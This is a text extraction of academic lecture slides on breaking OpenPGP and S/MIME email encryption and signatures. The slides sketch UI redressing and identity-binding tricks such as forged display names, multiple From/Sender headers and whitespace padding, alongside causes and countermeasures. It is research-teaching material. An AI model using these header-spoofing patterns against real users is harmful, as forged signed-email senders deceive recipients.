Page 78: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

1. Breaking Email Encryption

1. Malleability Gadget Attacks on S/MIME

2. Malleability Gadget Attacks on OpenPGP

3. Direct Exfiltration Attacks

4. Responsible Disclosure

2. Breaking Email Signatures

1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

86

Page 79: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

87

Page 80: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

88

Page 81: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

UI Redressing – Causes

• HTML and CSS support in email clients

• Security indicators in mail body• Often implemented by third-party plugin• Intuitive (signature assigned to plaintext)

89

Page 82: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

UI Redressing – Countermeasures

90

Enigmail< 2.0.8

Enigmail≥ 2.0.8

Page 83: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

91

Page 84: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

1. Breaking Email Encryption

1. Malleability Gadget Attacks on S/MIME

2. Malleability Gadget Attacks on OpenPGP

3. Direct Exfiltration Attacks

4. Responsible Disclosure

2. Breaking Email Signatures

1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

92

Page 85: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

How Is Signer Bound to Signed Content?

93

Page 86: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Identity Binding Attacks

94

What could possibly go wrong?

Page 87: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Identity Binding Attacks

95

Eve <[email protected]>From:

Displayed senderVerification logic

RFC 5322 display names

Page 88: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Identity Binding Attacks

96

From: [email protected]

From: [email protected]

From: [email protected] <[email protected]>

Displayed senderVerification logic

From: [email protected]

Sender: [email protected]

Reply-to: [email protected]

Multiple headers

Page 89: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Identity Binding Attacks

97

From: [email protected] [ whitespace ] <[email protected]>

[valid signature by [email protected]]

<[email protected]>

Page 90: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Identity Binding Attacks – Causes & Countermeasures

• Functional features (Sender, From) have becomesecurity relevant

• Explicitly showing signer details shifts problem to user

98

Page 91: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

99

Page 92: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

106

Page 93: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

1. Breaking Email Encryption

1. Malleability Gadget Attacks on S/MIME

2. Malleability Gadget Attacks on OpenPGP

3. Direct Exfiltration Attacks

4. Responsible Disclosure

2. Breaking Email Signatures

1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

107

Page 94: Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Conclusions

• Introduced malleability gadgets and backchannels

• Self-exfiltrating plaintexts; applicable to different standards as well

• Crypto standards need to evolve• Current S/MIME is broken

• OpenPGP needs clarification

• Signed emails have problems as well

• Crypto standards are not only about strong cryptographic algorithms

• Secure HTML email is challenging

108